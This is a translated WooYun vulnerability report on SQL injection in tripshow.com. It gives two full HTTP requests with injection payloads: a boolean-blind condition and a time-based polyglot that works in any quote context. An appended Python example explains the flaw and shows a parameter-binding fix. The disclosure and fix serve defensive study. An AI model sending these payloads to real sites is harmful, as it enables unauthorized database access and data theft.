Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0142115

Title: Tripshow (途秀网) - SQL injection bundle on one site

Vendor: 途秀网 (Tripshow)

Author: miracle

Submitted: 2015-09-19 09:02

Fixed by: 2015-11-03 09:04

Published: 2015-11-03 09:04

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-09-19: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-11-03: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

#1

POST /weiboapp/73/processor HTTP/1.1
Content-Length: 83
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://tripshow.com:80/
Cookie: PHPSESSID=5gdueeiomurk8pds0rab7og981; backurl=%2Fpictures%2Fshow%2Fnull; callbackurl=%2Fweiboapp%2Flogin%2Fchk; newyear2014_from=http%3A%2F%2Ftripshow.com%2F; todaysidck=55fa83900f447; referer=http%3A%2F%2Ftripshow.com%2F5343689283%2Fmyself; weiboapp_login_backurl=%2Fweiboapp%2F88%2F%3Fact%3D; __utmt=1; __utma=268593204.163940433.1442481527.1442481527.1442481527.1; __utmb=268593204.7.10.1442481527; __utmc=268593204; __utmz=268593204.1442481527.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); _pk_ref.1.07eb=%5B%22%22%2C%22%22%2C1442481529%2C%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.1.07eb=f79d3e775f458bcc.1442481529.1.1442484501.1442481529.; _pk_ses.1.07eb=*; _ga=GA1.2.962798704.1442481533; _gat=1; 2014_show=question; Hm_lvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442482897,1442483323,1442484256,1442484749; Hm_lpvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442484749; HMACCOUNT=F1B3AFC580D0BFE1; 2014_goto=http%3A//tripshow.com/campaign/newyear/activity/1756852%23to6
Host: tripshow.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
action=get_imglist&id=756505%20AND%203*2*1%3d6%20AND%20187%3d187&img_types=2&page=2


#2

POST /products/brandpages/open HTTP/1.1
Content-Length: 262
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://tripshow.com:80/
Cookie: PHPSESSID=5gdueeiomurk8pds0rab7og981; backurl=%2Fpictures%2Fshow%2Fnull; callbackurl=%2Fweiboapp%2Flogin%2Fchk; newyear2014_from=http%3A%2F%2Ftripshow.com%2F; todaysidck=55fa83900f447; referer=http%3A%2F%2Ftripshow.com%2F5343689283%2Fmyself; weiboapp_login_backurl=%2Fweiboapp%2F88%2F%3Fact%3D; __utmt=1; __utma=268593204.163940433.1442481527.1442481527.1442481527.1; __utmb=268593204.7.10.1442481527; __utmc=268593204; __utmz=268593204.1442481527.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); _pk_ref.1.07eb=%5B%22%22%2C%22%22%2C1442481529%2C%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.1.07eb=f79d3e775f458bcc.1442481529.1.1442484501.1442481529.; _pk_ses.1.07eb=*; _ga=GA1.2.962798704.1442481533; _gat=1; 2014_show=question; Hm_lvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442482897,1442483323,1442484256,1442484749; Hm_lpvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442484749; HMACCOUNT=F1B3AFC580D0BFE1; 2014_goto=http%3A//tripshow.com/campaign/newyear/activity/1756852%23to6
Host: tripshow.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
address=3137%20Laguna%20Street&AgencyTypes=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&description=1&email=sample%40email.tst&location=1&tel=555-666-0606&url=1&VersionID=1
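
The following is an added example and is not part of the original report or of tripshow.com's code. It reproduces the pattern that request #1 exercises: the `id` parameter is concatenated into the SQL text, so the true/false pair `3*2*1=6` and `3*2*1=7` yields different result sets, which is the boolean-blind oracle a scanner or sqlmap uses to enumerate data one bit at a time (the 55 databases reported below). The `images` table, its rows and the `get_imglist_*` handlers are assumptions standing in for the unknown PHP/MySQL backend; SQLite in memory is used so the block runs offline. Request #2's `if(now()=sysdate(),sleep(0),0)` payload is MySQL-specific and is not reproduced here. The hardened handler shows the fix: validate the type and bind parameters instead of building SQL from the request body.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed input: the exact POST body from request #1 above (the true branch).
BODY_TRUE = "action=get_imglist&id=756505%20AND%203*2*1%3d6%20AND%20187%3d187&img_types=2&page=2"
# Constructed twin of the same payload with a false condition (3*2*1=7).
BODY_FALSE = "action=get_imglist&id=756505%20AND%203*2*1%3d7%20AND%20187%3d187&img_types=2&page=2"


def make_db():
    """Assumed stand-in schema; the real tripshow.com schema is unknown."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE images (id INTEGER, img_type INTEGER, path TEXT)")
    conn.executemany(
        "INSERT INTO images VALUES (?, ?, ?)",
        [(756505, 2, "/img/a.jpg"), (756505, 2, "/img/b.jpg"), (1, 2, "/img/c.jpg")],
    )
    return conn


def get_imglist_vulnerable(conn, body):
    """Vulnerable pattern: request values are pasted into the SQL string."""
    params = parse_qs(body)
    image_id = params["id"][0]
    img_types = params["img_types"][0]
    # 'id' is attacker controlled, so the injected 'AND 3*2*1=6 AND 187=187'
    # becomes part of the WHERE clause and is evaluated by the database.
    sql = f"SELECT path FROM images WHERE id={image_id} AND img_type={img_types} ORDER BY path"
    return [row[0] for row in conn.execute(sql)]


def get_imglist_fixed(conn, body):
    """Hardened handler: strict type check, then a bound parameter."""
    params = parse_qs(body)
    try:
        image_id = int(params["id"][0])
        img_types = int(params["img_types"][0])
    except ValueError:
        # A real handler would answer HTTP 400; None marks the rejected request here.
        return None
    rows = conn.execute(
        "SELECT path FROM images WHERE id=? AND img_type=? ORDER BY path",
        (image_id, img_types),
    )
    return [row[0] for row in rows]


def boolean_oracle_differs(fetch, conn):
    """Blind-SQLi signal: the true and false payloads produce different responses."""
    return fetch(conn, BODY_TRUE) != fetch(conn, BODY_FALSE)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, true branch :", get_imglist_vulnerable(db, BODY_TRUE))
    print("vulnerable, false branch:", get_imglist_vulnerable(db, BODY_FALSE))
    print("oracle (vulnerable)     :", boolean_oracle_differs(get_imglist_vulnerable, db))
    print("fixed, true branch      :", get_imglist_fixed(db, BODY_TRUE))
    print("oracle (fixed)          :", boolean_oracle_differs(get_imglist_fixed, db))
```

Request #2 uses the same idea in a form that does not depend on how the parameter is quoted: the three `if(now()=sysdate(),sleep(0),0)` branches are separated by `/*'...'` and `"...*/` so that one of them is live whether `AgencyTypes` lands unquoted, in single quotes or in double quotes, and `sleep(0)` is the zero-delay probe a scanner sends before switching to a real delay. Parameter binding as in `get_imglist_fixed` closes all three contexts at once.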

Proof of vulnerability:

Ran the first injection point as proof: 55 databases.

[Screenshot: 2.png]

Fix recommendation:

Copyright notice: when reposting, credit the source: miracle@WooYun


Vulnerability response

Vendor response:

Could not reach the vendor, or the vendor actively declined to respond